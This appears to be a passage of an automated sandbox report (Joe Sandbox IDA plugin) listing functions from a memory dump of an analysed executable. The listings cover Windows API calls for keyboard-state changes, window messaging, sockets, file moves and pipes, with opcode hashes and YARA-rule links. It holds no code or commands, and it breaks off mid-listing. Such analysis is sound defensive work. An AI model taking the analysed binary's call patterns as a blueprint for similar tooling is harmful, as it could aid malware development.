PostMessageW.USER32(?,00000101,0000005B,?), ref: 0083B020

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e4f938719305adf712c091431817855387f967b9e430f04aa95d4bf08474ee47
Instruction ID: 766bda9168e31c1524a617da33e0fe3daf51bfb6adbed5f30f33571c9672291c
Opcode Fuzzy Hash: e4f938719305adf712c091431817855387f967b9e430f04aa95d4bf08474ee47
Instruction Fuzzy Hash: 5551D4E06047D53DFB3A4234C855BBB7EA9BB86304F088589E2D5D54C2C7D9ACC4D791

Function 0083ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0083AD19
GetKeyboardState.USER32(?), ref: 0083AD2E
SetKeyboardState.USER32(?), ref: 0083AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0083ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0083ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0083AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0083AE38

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 9986ddd006f1d9d25a7689df1b5ab0d81706676591777ce4098a0736795a0304
Instruction ID: 0c2c83a70163d4fb53793d654cc225e22d0513a04fd23b5d79f5dac07d9064bf
Opcode Fuzzy Hash: 9986ddd006f1d9d25a7689df1b5ab0d81706676591777ce4098a0736795a0304
Instruction Fuzzy Hash: E751C5A15047D53DFB3A8364CC95B7A7E98BB86304F088588E1D5DA8C2D294EC84D792

Function 0080542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00813CD6,?,?,?,?,?,?,?,?,00805BA3,?,?,00813CD6,?,?), ref: 00805470
__fassign.LIBCMT ref: 008054EB
__fassign.LIBCMT ref: 00805506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00813CD6,00000005,00000000,00000000), ref: 0080552C
WriteFile.KERNEL32(?,00813CD6,00000000,00805BA3,00000000,?,?,?,?,?,?,?,?,?,00805BA3,?), ref: 0080554B
WriteFile.KERNEL32(?,?,00000001,00805BA3,00000000,?,?,?,?,?,?,?,?,?,00805BA3,?), ref: 00805584

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: ee9587ce9a49a18ce64dcca420a0b60dd72f5a329c829853ad859da6bc1ee5f9
Instruction ID: c19720c610a134a72035243b93f6e51ac2eb6081012cb6ef5a4689aa7cf4daac
Opcode Fuzzy Hash: ee9587ce9a49a18ce64dcca420a0b60dd72f5a329c829853ad859da6bc1ee5f9
Instruction Fuzzy Hash: A7519EB1A00649AFDB10CFA8DC95AEEBBF9FF09300F14411AE955E7291E6709A41CF60

Function 007F2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 007F2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 007F2D53
_ValidateLocalCookies.LIBCMT ref: 007F2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 007F2E0C
_ValidateLocalCookies.LIBCMT ref: 007F2E61

Strings

csm, xrefs: 007F2DF6

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6e10744f6f14a9225b37dbd3b5d75f2eea08f4195ead7ac205cd2eb1ea14ba41
Instruction ID: 6d636b31da74532efb0ad8c9f674299e01809a997c425b987b0df01f6dafeb94
Opcode Fuzzy Hash: 6e10744f6f14a9225b37dbd3b5d75f2eea08f4195ead7ac205cd2eb1ea14ba41
Instruction Fuzzy Hash: 32419534B0020DEBCF14DF68C849AAEBBB5BF45364F148155EA14AB353D7399A06CBA1

Function 008510B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00851112
WSAGetLastError.WSOCK32 ref: 00851121
WSAGetLastError.WSOCK32 ref: 008511C9
closesocket.WSOCK32(00000000), ref: 008511F9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
Instruction ID: 18b738ecdf24ba230d3c835f431cfa3c537eb666be8a47fb4b4ccffe1bf86757
Opcode Fuzzy Hash: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
Instruction Fuzzy Hash: EC412531200604AFDB109F24C889BA9BBE9FF44329F149099FD46DB291C774ED45CBE1

Function 0083CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0083CF22,?), ref: 0083DDFD

Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0083CF22,?), ref: 0083DE16

lstrcmpiW.KERNEL32(?,?), ref: 0083CF45
MoveFileW.KERNEL32(?,?), ref: 0083CF7F
_wcslen.LIBCMT ref: 0083D005
_wcslen.LIBCMT ref: 0083D01B
SHFileOperationW.SHELL32(?), ref: 0083D061

Strings

\*.*, xrefs: 0083CFF3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: ef9360800cd6ccc499780a6ac95010cd98462ca5516b21bebf71f5add3763f96
Instruction ID: 469b8e62aba40d65b8f6993f7b5aec0883aeadd0d1f1a89b644b69ef30f123c8
Opcode Fuzzy Hash: ef9360800cd6ccc499780a6ac95010cd98462ca5516b21bebf71f5add3763f96
Instruction Fuzzy Hash: 3B4144719052189FDF12EBA4D985AEEB7B8FF48340F0000E6E605EB241EF74A644CB90

Function 00862DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00862E1C
GetWindowLongW.USER32(?,000000F0), ref: 00862E4F
GetWindowLongW.USER32(?,000000F0), ref: 00862E84
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00862EB6
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00862EE0
GetWindowLongW.USER32(?,000000F0), ref: 00862EF1
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00862F0B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4fea7e6b7e673537d62ee1a6282aeb5f6704a54d93d3d24ddfbef6bfcda30e2d
Instruction ID: 4121c3f86b0d4ed78c05ac8fdfe5767e59b57baf5f400a1d1cd1bb4523b122b1
Opcode Fuzzy Hash: 4fea7e6b7e673537d62ee1a6282aeb5f6704a54d93d3d24ddfbef6bfcda30e2d
Instruction Fuzzy Hash: C13126306445409FEB20CF58DC88F6537E0FB6A710F1A01A5F951CF2B2CBB2A840DB01

Function 00837726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0083778F
SysAllocString.OLEAUT32(00000000), ref: 00837792
SysAllocString.OLEAUT32(?), ref: 008377B0
SysFreeString.OLEAUT32(?), ref: 008377B9
StringFromGUID2.OLE32(?,?,00000028), ref: 008377DE
SysAllocString.OLEAUT32(?), ref: 008377EC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0eadae21edcefad1182d37d51ccb0ded85a87839b429964f57c7501fd9b57bfb
Instruction ID: 33ae849dcceafe28ceff1d92ac97d6c6e94b9fd3b88de25aef2213804349c67c
Opcode Fuzzy Hash: 0eadae21edcefad1182d37d51ccb0ded85a87839b429964f57c7501fd9b57bfb
Instruction Fuzzy Hash: D42192B6608219AFDB20DFA9CC88CBB77ACFB49764B058025F915DB150D670DC41C7A4

Function 008377FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837868
SysAllocString.OLEAUT32(00000000), ref: 0083786B
SysAllocString.OLEAUT32 ref: 0083788C
SysFreeString.OLEAUT32 ref: 00837895
StringFromGUID2.OLE32(?,?,00000028), ref: 008378AF
SysAllocString.OLEAUT32(?), ref: 008378BD

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 577330a6a209f4986f00d5518444636e7f784c0044d2a0c900cdcd51aebf30a1
Instruction ID: 9e1834488b6f4b5e4876c3bcff22707b0aa164fd5f067aee00839a981212cbde
Opcode Fuzzy Hash: 577330a6a209f4986f00d5518444636e7f784c0044d2a0c900cdcd51aebf30a1
Instruction Fuzzy Hash: 8821C471605208AFDB209FA9CC8CDBA77ECFB49364B108035F914CB2A0DA70DC41CBA8

Function 008404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 008404F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0084052E

Strings

nul, xrefs: 00840567

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
Instruction ID: 3d8d021f56b6fb3ba7e3cd21106949c59da4d6ab11c88afa787431a581f483b9
Opcode Fuzzy Hash: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
Instruction Fuzzy Hash: BB213075500309ABDF209F69DC44AAB7BA4FF45768F214A19FAA1E72E0D7B09950CF20

Function 008405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 008405C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00840601

Strings

nul, xrefs: 00840639

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 2328366ea37a70e71065f6d7a0431eedbcd4e3d1aa4c20e84cbdb35d01ae3c38
Instruction ID: 449be12832d2d3bc7c7dab36f98d1b9e83323fe7712e256e805366a602b2a3ce
Opcode Fuzzy Hash: 2328366ea37a70e71065f6d7a0431eedbcd4e3d1aa4c20e84cbdb35d01ae3c38
Instruction Fuzzy Hash: 0B2181755003099BDB209F698C04AAB77E4FFA5724F214A19FEA2E72E0D7B09860CF10

Function 008640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
Part of subcall function 007D600E: GetStockObject.GDI32(00000011), ref: 007D6060
Part of subcall function 007D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00864112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0086411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0086412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00864139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00864145

Strings

Msctls_Progress32, xrefs: 008640E3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 0574ca5a9e92f38ec75be4a6fd14480f255682d5df053ac1a161b9cfa253dffa
Instruction ID: 6f08ecb3b5e1d3317fe5aacef59b4cc337a6993d12e48a77f88cbcb3f556e08d
Opcode Fuzzy Hash: 0574ca5a9e92f38ec75be4a6fd14480f255682d5df053ac1a161b9cfa253dffa
Instruction Fuzzy Hash: 1111D0B214021DBEEF119E64CC86EEB7F6DFF09798F014111BA18E2150C6769C219BA4

Function 0080D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0080D7A3: _free.LIBCMT ref: 0080D7CC

_free.LIBCMT ref: 0080D82D

Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0

_free.LIBCMT ref: 0080D838
_free.LIBCMT ref: 0080D843
_free.LIBCMT ref: 0080D897
_free.LIBCMT ref: 0080D8A2
_free.LIBCMT ref: 0080D8AD
_free.LIBCMT ref: 0080D8B8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: fad197dcc1244177481bf05bc1e65ba4ca2ac2f9687b3afe4b4be191722346ff
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 2B112E71540B04AAE6A1BFF8CC4BFCB7BDCFF44700F404825B299E64D2DA75B5058662

Function 0083DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0083DA74
LoadStringW.USER32(00000000), ref: 0083DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083DA91
LoadStringW.USER32(00000000), ref: 0083DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0083DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0083DAB9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: ac57fb5f40c0197f75c92fe1fc886b52459c9b7d5a702937e196fc216b3216eb
Instruction ID: fbfeac41f82d5d8ee06eae967376bfa9f0f815fe5f36d65987d1fe1090b6e4cf
Opcode Fuzzy Hash: ac57fb5f40c0197f75c92fe1fc886b52459c9b7d5a702937e196fc216b3216eb
Instruction Fuzzy Hash: D3014FF25002187FE710ABE49D89EFA766CF708301F401496F786E2041E6B49E844B74

Function 0084096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(016CDFA0,016CDFA0), ref: 0084097B
EnterCriticalSection.KERNEL32(016CDF80,00000000), ref: 0084098D
TerminateThread.KERNEL32(?,000001F6), ref: 0084099B
WaitForSingleObject.KERNEL32(?,000003E8), ref: 008409A9
CloseHandle.KERNEL32(?), ref: 008409B8
InterlockedExchange.KERNEL32(016CDFA0,000001F6), ref: 008409C8
LeaveCriticalSection.KERNEL32(016CDF80), ref: 008409CF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fd12aa4c9d9554d5b301d7a1a8b27689d682af49ab547d0bcc93a97163f209a1
Instruction ID: 722982687d4ef6000a47edde674ffb05aec2f59ee63b262c153b333fc54283cf
Opcode Fuzzy Hash: fd12aa4c9d9554d5b301d7a1a8b27689d682af49ab547d0bcc93a97163f209a1
Instruction Fuzzy Hash: 21F03C32442A02BBD7415FA4EE9CBE6BB39FF01702F412025F242909A1C7B59465CFA0

Function 00851C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00851DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00851DE1
WSAGetLastError.WSOCK32 ref: 00851DF2
htons.WSOCK32(?,?,?,?,?), ref: 00851EDB
inet_ntoa.WSOCK32(?), ref: 00851E8C

Part of subcall function 008339E8: _strlen.LIBCMT ref: 008339F2

Part of subcall function 00853224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0084EC0C), ref: 00853240

_strlen.LIBCMT ref: 00851F35

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: c617f65cc46bd6387b197794da1d37ea205e74dcc2478808efd3ca0744b9cab6
Instruction ID: d9a832dda0e518ccf18bddba7d6ec5169165f2fbbb20976a2df03eb7f74c8a76
Opcode Fuzzy Hash: c617f65cc46bd6387b197794da1d37ea205e74dcc2478808efd3ca0744b9cab6
Instruction Fuzzy Hash: DCB1BF31204340AFCB24DF24C889F2A7BA5FF85318F54854CF8569B2A2DB75ED45CB91

Function 007D5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 007D5D30
GetWindowRect.USER32(?,?), ref: 007D5D71
